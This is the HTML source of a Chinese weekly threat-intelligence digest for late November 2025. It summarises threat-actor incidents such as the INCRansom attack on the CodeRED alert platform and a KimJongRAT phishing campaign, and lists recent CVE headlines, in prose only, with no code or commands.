leaf="">每周一篇</span></p></div><div style="text-align: center;align-self: center;background: #FFFFFF;border-radius: 1px;padding: 2px 3px 1px 3px;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 14px;color: #3C83FA;line-height: 16px;word-break: break-word;" data-mid=""><span leaf="">情报追踪</span></p></div></div></div><div style="display: flex;align-items: flex-start;width: 100%;justify-content: space-between;padding: 18px 0 0 0;" data-mid="" mpa-from-tpl="t"><div style="display: flex;border-width: 1px;border-style: solid;border-color: rgba(40, 44, 51, 0.2);" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8kr8bk1rdn" data-pm-slice="0 0 []"><div style="text-align: center;padding: 1px 12px 0 9px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #282C33;line-height: 21px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8kr8al1tgn" style="font-size: 14px;">2025年11月</span></p></div><div style="text-align: center;background: #3C83FA;padding: 1px 12px 0 12px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #FFFFFF;line-height: 21px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8krkjx1e1y" style="font-size: 11px;" data-mpa-action-id="md8krkkyw5a" data-pm-slice="0 0 []">11.24-11.30</span></p></div></div><p style="width: 80px;height: 14px;display: flex;justify-content: center;align-items: center;flex-shrink: 0;margin: 4px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050097" class="rich_pages wxw-img" data-ratio="0.175" data-w="160" src="https://wechat2rss.xlab.app/img-proxy/?k=5a83ae18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FchaiaZrj8iadrPWzLAFuXVKr31TUA1zIQs9pWSZ5jGicicdj7xjxPibjNcticLgOywtdWGic8tLqJ0fQF39tSd6nWoMXw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 17px 0 -9px 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050104" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=39f68913&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FnLKDrIxQFEEGkn0pFIwOMM5pPQzficCmVP1JWibI5z0miaKzMLYicUZkkF7N1PJkialw9IakBGQumOItHETEaaa0jRw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="width: 100%;text-align: left;padding: 0 17px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8hw5bc23fc" data-pm-slice="0 0 []"><p><span leaf="" mpa-font-style="md8hwswb23en" style="font-size: 16px;" data-mpa-action-id="md8hwswqeph" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【家族团伙事件】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">INCRansom借未知漏洞潜入系统，造成相关部门服务中断及大量信息窃取危机</span></p></li><li style="font-size:13px;"><p><span leaf="">UAT-5394借GitHub和Google Drive实现KimJongRAT双重载荷切换与数据窃取</span></p></li><li style="font-size:13px;"><p><span leaf="">Dropping Elephant利用MSBuild部署嵌入式Python后门，实现系统控制与持久留存</span></p></li><li style="font-size:13px;"><p><span leaf="">APT35借微软Exchange漏洞发动ProxyShell链攻击，致敏感信息泄漏与长期渗透</span></p></li><li style="font-size:13px;"><p><span leaf="">RomCom用SocGholish虚假更新投恶意软件，启动远程访问工具</span></p></li></ul><p><span leaf="" mpa-font-style="md8hx4foxsq" style="font-size: 16px;" data-mpa-action-id="md8hx4g416kq" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【热点攻击手段】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">综合运用鱼叉式邮件、水坑网站等手段达成初始入侵，实现长期隐蔽窃取情报</span></p></li><li style="font-size:13px;"><p><span leaf="">利用虚假的 Windows 更新投递多种窃取程序实现数据窃取及系统控制</span></p></li><li style="font-size:13px;"><p><span leaf="">借伪造应用、零点击漏洞破加密防线，入侵加密消息应用，窃敏感信息并扩大攻击圈</span></p></li><li style="font-size:13px;"><p><span leaf="">伪造“阅后即焚”功能劫持WhatsApp会话并投放木马，实现大规模感染与信息窃取</span></p></li><li style="font-size:13px;"><p><span leaf="">基于供应链攻击窃OAuth令牌，非法访Salesforce、泄露信息还威胁加密</span></p></li></ul><p><span leaf="" mpa-font-style="md8hxiy01bal" style="font-size: 16px;" data-mpa-action-id="md8hxiyhg7z" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【重点漏洞情报】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:normal;"><h3 style=";" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: normal;">GeoServer XML 外部实体注入(XXE)漏洞（CVE-2025-58360）</span></span></h3></li><li style="font-size:14px;font-weight:normal;"><h3 style=";" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: normal;">Fluent Bit in_docker 缓冲区溢出漏洞（CVE-2025-12970）</span></span></h3></li><li style="font-size:14px;font-weight:normal;"><h3 style=";" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: normal;">Anyscale Ray 远程代码执行漏洞（CVE-2025-34351）</span></span></h3></li><li style="font-size:14px;font-weight:normal;"><h3 style=";" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: normal;">Fugue Pickle 反序列化远程代码执行漏洞（CVE-2025-62703）</span></span></h3></li></ul></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;align-self: flex-end;margin: -9px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050102" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=343f759b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FlEA1fhJ8dPY8CTT6cndXkb6ur6jwOSHJZrUN8G5PHYmGgEsFZFiaAS4vMZEBibcYNe26PC6afBZcvSWSDxLCzJ9A%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">01</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in1abcbk" style="font-size: 20px;" data-mpa-action-id="md8in1bg1b37" data-pm-slice="0 0 []">家族团伙事件</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">INCRansom借未知漏洞潜入系统，造成相关部门服务中断及大量信息窃取危机</span></span></p></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type: circle;&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,{&#34;style&#34;:&#34;font-size:14px;&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: left;"><span leaf="">G1032, INCRRansom group</span></span></p></div></li><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="font-weight: bold;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">家族团伙主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">医疗, 交通, 政法, 教育, 建筑与不动产</span></span></p></div></li><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/onsolve-codered-cyberattack-disrupts-emergency-alert-systems-nationwide/" target="_blank">https://www.hendryadrian.com/onsolve-codered-cyberattack-disrupts-emergency-alert-systems-nationwide/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;" data-mpa-action-id="md8j92vi11y1"><span leaf=""><span textstyle="" style="font-size: 14px;">Crisis24的CodeRED紧急通知平台遭到网络攻击，该平台主要为公共安全相关机构提供紧急警报服务。目前攻击者通过未知漏洞侵入系统，仅在该平台环境内活动，未影响所属机构其他系统。期间攻击者窃取了平台存储的姓名、住址、电子邮件、电话号码及密码等敏感数据。随后，相关攻击组织公开宣称对此负责，展示获取的客户数据并威胁拍卖。此次事件突显出针对关键公共安全相关系统的针对性攻击风险，以及旧备份恢复可能带来的数据丢失问题，暴露了平台在安全防护和入侵检测方面的不足。攻击导致紧急通知系统中断，影响公共安全相关信息及时传递，敏感个人数据泄露还可能引发后续安全威胁，对相关使用机构造成广泛影响。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">UAT-5394借GitHub和Google Drive实现KimJongRAT双重载荷切换与数据窃取</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><p style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span leaf="" style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span textstyle="" style="letter-spacing: 0.034em;background-color: transparent;font-weight: bold;">家族团伙</span><span textstyle="" style="font-weight: bold;">主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">Thallium, Velvet Chollima, Baby Coin, APT-C-55, Smoke Screen, Black Banshee, Mystery Baby,  KimSuky</span></span></p></div></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://securityonline.info/kimsuky-apt-deploys-dual-kimjongrat-payloads-switching-between-pe-powershell-based-on-windows-defender-status/" target="_blank">https://securityonline.info/kimsuky-apt-deploys-dual-kimjongrat-payloads-switching-between-pe-powershell-based-on-windows-defender-status/</a></span></span></p></li></ul></p></div></div><p style="text-indent: 2em;margin-top: 24px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mef52r511pda" data-mpa-action-id="mef52r5b7jz" data-pm-slice="0 0 []">此次事件中，UAT - 5394利用升级版恶意软件对部分重要机构及知名网络服务平台实施精准打击，作战链条复杂隐蔽，借助公共资源平台托管恶意文件以混淆痕迹、延长潜伏时间。攻击先通过冒充公共机构的钓鱼邮件展开，邮件附带含密码保护诱饵 PDF 和恶意文件的压缩包，受害者点击后会经跳转服务器下载恶意载荷，相关文件展示伪装内容诱导信任，还会检测系统防护状态动态调用后续载荷。恶意程序会执行反虚拟机检查、解密配置，下载多个功能模块，提取密钥、收集设备信息、凭证数据等并打包传输，同时建立系统持久化，实现剪贴板监控、键盘记录等功能并定期与控制服务器通信。此外，攻击者还构建并行攻击链并合并，搭建仿冒知名平台登录页面的钓鱼网站窃取用户凭证。此次攻击导致敏感数据大规模外泄，持续的系统持久化与远程控制也为后续深层破坏埋下隐患。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027324" class="rich_pages wxw-img" data-ratio="0.76953125" data-s="300,640" data-type="png" data-w="768" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=663e7225&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWU3pG3Rv4ehDd5TnAOWwNICWVKSicg8hcY3PQnsGIX3oicAV5LiazgicV1XezYc8EWeZETwYwk9oD4lCw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9i4u1nvn"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" 